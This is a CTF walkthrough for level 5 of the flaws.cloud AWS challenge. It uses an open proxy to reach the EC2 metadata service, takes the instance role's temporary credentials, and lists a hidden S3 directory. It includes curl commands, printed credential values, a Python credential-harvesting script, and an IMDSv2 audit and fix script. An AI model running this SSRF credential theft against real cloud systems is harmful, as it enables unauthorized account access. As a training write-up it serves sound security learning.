Level 5

A CTF walkthrough for level 5 of Flaws.Cloud

Enumerating the Web Server

In the previous level, we identified the entry point for Level 5 as http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/.

The webpage names the Level 6 bucket, but browsing to it directly is not enough: the Level 6 site lives in a hidden directory inside that bucket, and we need to find its name. The page also tells us that this web server is running an HTTP proxy and gives examples of how to use it, which makes the proxy our way in.

Let's use the proxy to reach the EC2 Instance Metadata Service at the link-local address 169.254.169.254 and check whether the instance has an Instance Profile attached. Requesting /latest/meta-data/iam/security-credentials/ returns the name of the attached role (here it is flaws); appending that name to the path returns the role's temporary credentials.

curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

[snip]
"AccessKeyId" : "ASIA6GG7PSQGTRQJF23G",
  "SecretAccessKey" : "W0stF21iQdqSTwMSzZWBbK5E7ucenpQsSAUNPiPn",
  "Token" : "IQoJb3J
[snip]

Nice! So this EC2 has an Instance Profile called flaws. Let's save the three values as a CLI profile named flaws5 (AccessKeyId as aws_access_key_id, SecretAccessKey as aws_secret_access_key, and Token as aws_session_token; without the session token these temporary STS credentials are rejected) and verify they work.

aws --profile flaws5 sts get-caller-identity
{
    "UserId": "AROAI3DXO3QJ4JAWIIQ5S:i-05bef8a081f307783",
    "Account": "975426262029",
    "Arn": "arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783"
}
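The steps above, pulling the credential document through the proxy, checking it, and turning it into a CLI profile, can be scripted. The following is an added example written for this walkthrough and is not part of the original page or of flaws.cloud itself. The proxy host, the IMDS path and the profile name flaws5 are taken from the walkthrough; the credential document at the bottom is a constructed sample with fake values so the parsing and profile generation can be exercised offline, and the live fetch is only used when you run it against the real proxy.

```python
"""Harvest instance-profile credentials via the Level 5 proxy and build a CLI profile.

Added example for the walkthrough; not code from the original page.
"""
import json
import urllib.request
from datetime import datetime, timezone
from typing import List, Optional

# Taken from the walkthrough: the proxy prefix and the CLI profile name.
PROXY_BASE = "http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/"
IMDS_HOST = "169.254.169.254"
PROFILE_NAME = "flaws5"


def proxy_url(path: str, base: str = PROXY_BASE) -> str:
    """Build the URL the proxy needs in order to fetch an IMDS path for us."""
    return f"{base}{IMDS_HOST}/latest/meta-data/{path.lstrip('/')}"


def fetch(url: str, timeout: int = 5) -> str:
    """GET a URL through the proxy (network access; only used when run live)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode()


def list_roles() -> List[str]:
    """Role names exposed by IMDS, one per line (live call)."""
    body = fetch(proxy_url("iam/security-credentials/"))
    return [line.strip() for line in body.splitlines() if line.strip()]


def parse_credentials(body: str) -> dict:
    """Parse an IMDS credential document and reject anything unusable."""
    doc = json.loads(body)
    if doc.get("Code") != "Success":
        raise ValueError(f"IMDS returned Code={doc.get('Code')!r}")
    for key in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration"):
        if not doc.get(key):
            raise ValueError(f"credential document is missing {key}")
    return doc


def is_expired(creds: dict, now: Optional[datetime] = None) -> bool:
    """Instance-profile credentials are short-lived; check before relying on them."""
    now = now or datetime.now(timezone.utc)
    exp = datetime.strptime(creds["Expiration"], "%Y-%m-%dT%H:%M:%SZ")
    return now >= exp.replace(tzinfo=timezone.utc)


def cli_profile(creds: dict, name: str = PROFILE_NAME) -> str:
    """Render a ~/.aws/credentials section; the session token is mandatory for STS creds."""
    return (
        f"[{name}]\n"
        f"aws_access_key_id = {creds['AccessKeyId']}\n"
        f"aws_secret_access_key = {creds['SecretAccessKey']}\n"
        f"aws_session_token = {creds['Token']}\n"
    )


# Constructed sample in the IMDS document format; every value is fake.
SAMPLE_DOC = """{
  "Code" : "Success",
  "LastUpdated" : "2024-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLEKEYID0000",
  "SecretAccessKey" : "exampleSecretKeyDoNotUse0000000000000000",
  "Token" : "IQoJb3JpZ2luX2VjEXAMPLE",
  "Expiration" : "2024-01-01T06:00:00Z"
}"""

if __name__ == "__main__":
    # Live use against the proxy would be:
    #   role = list_roles()[0]
    #   body = fetch(proxy_url(f"iam/security-credentials/{role}"))
    creds = parse_credentials(SAMPLE_DOC)
    print(cli_profile(creds))
    print("expired:", is_expired(creds))
```

Append the printed section to ~/.aws/credentials and the `aws --profile flaws5 sts get-caller-identity` call from the walkthrough should succeed until the Expiration time; IMDS rotates the role credentials shortly before then, so re-run the fetch rather than reusing stale values.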

The instance role should let us list the Level 6 bucket and find the hidden directory the page told us about.

aws --profile flaws5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
                           PRE ddcc78ff/
2017-02-26 19:11:07        871 index.html

The listing reveals the hidden directory, ddcc78ff/. Browsing to http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ gives us the access keys for Level 6.

Wrap-Up

In Level 5, we found an HTTP proxy on the EC2 instance that fetches whatever URL it is given, including the link-local metadata address 169.254.169.254 that is only meant to be reachable from the instance itself; in effect, a server-side request forgery. Through it we read the temporary credentials of the instance's flaws role, used them to list the Level 6 bucket, found the hidden directory, and retrieved the Level 6 access keys from that page.

The Instance Metadata Service (IMDS) exposes details about an EC2 instance, such as its networking info, security groups, user data, and the temporary credentials of its IAM role, to anything that can make an HTTP request to 169.254.169.254 from the instance. If the instance does not need it, disable it. If it does, require IMDSv2: its session token has to be obtained with a PUT request carrying a TTL header, which a simple GET-forwarding proxy like this one cannot issue, and keeping the PUT response hop limit at 1 stops the token from being fetched across a network hop such as a container's NAT. The instance role should also carry only the permissions the workload needs, so that a leak like this one exposes as little as possible. More details can be found in the AWS documentation.
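To see why the IMDSv2 requirement defeats this attack, and to find instances in an account that still allow IMDSv1, here is an added example written for this walkthrough (not code from the original page or from AWS). The token request is the real IMDSv2 handshake; the describe-instances response at the bottom is a constructed sample in the shape returned by `aws ec2 describe-instances`, so the audit runs offline, and the remediation uses the real `modify-instance-metadata-options` parameters.

```python
"""Audit EC2 metadata options for IMDSv1 exposure and build the fix.

Added example for the walkthrough; not code from the original page.
"""
import urllib.request
from typing import Dict, List


def imdsv2_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """The first thing an IMDSv2 client must send: a PUT with a TTL header.

    A proxy that only forwards a GET for a caller-supplied URL cannot produce
    this request, so with IMDSv2 required the Level 5 proxy returns nothing useful.
    """
    return urllib.request.Request(
        "http://169.254.169.254/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def imdsv1_exposed(describe_instances: dict) -> List[Dict[str, str]]:
    """Instances whose metadata endpoint is on but does not require a session token."""
    findings = []
    for reservation in describe_instances.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "enabled" and opts.get("HttpTokens") != "required":
                findings.append({
                    "InstanceId": inst["InstanceId"],
                    "HttpTokens": opts.get("HttpTokens", "unknown"),
                    "HopLimit": str(opts.get("HttpPutResponseHopLimit", "unknown")),
                })
    return findings


def remediation_args(instance_id: str) -> dict:
    """Keyword arguments for boto3's ec2.modify_instance_metadata_options()."""
    return {
        "InstanceId": instance_id,
        "HttpTokens": "required",        # IMDSv2 only
        "HttpEndpoint": "enabled",       # keep IMDS for the workload, just hardened
        "HttpPutResponseHopLimit": 1,    # token cannot cross a network hop
    }


def remediation_command(instance_id: str) -> str:
    """Equivalent AWS CLI invocation for operators who prefer the shell."""
    a = remediation_args(instance_id)
    return (
        "aws ec2 modify-instance-metadata-options "
        f"--instance-id {a['InstanceId']} --http-tokens {a['HttpTokens']} "
        f"--http-endpoint {a['HttpEndpoint']} "
        f"--http-put-response-hop-limit {a['HttpPutResponseHopLimit']}"
    )


# Constructed sample in the describe-instances format; instance IDs are fake.
SAMPLE_DESCRIBE = {
    "Reservations": [{"Instances": [
        {"InstanceId": "i-0aaaaaaaaaaaaaaaa",
         "MetadataOptions": {"State": "applied", "HttpTokens": "optional",
                             "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
        {"InstanceId": "i-0bbbbbbbbbbbbbbbb",
         "MetadataOptions": {"State": "applied", "HttpTokens": "required",
                             "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
        {"InstanceId": "i-0cccccccccccccccc",
         "MetadataOptions": {"State": "applied", "HttpTokens": "optional",
                             "HttpPutResponseHopLimit": 1, "HttpEndpoint": "disabled"}},
    ]}]
}

if __name__ == "__main__":
    for finding in imdsv1_exposed(SAMPLE_DESCRIBE):
        print(finding)
        print(remediation_command(finding["InstanceId"]))
```

With boto3 the live audit is `imdsv1_exposed(boto3.client("ec2").describe_instances())`; the instance with the endpoint disabled is not reported because nothing can query it, and the one already on `required` is the state every finding should be moved to.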
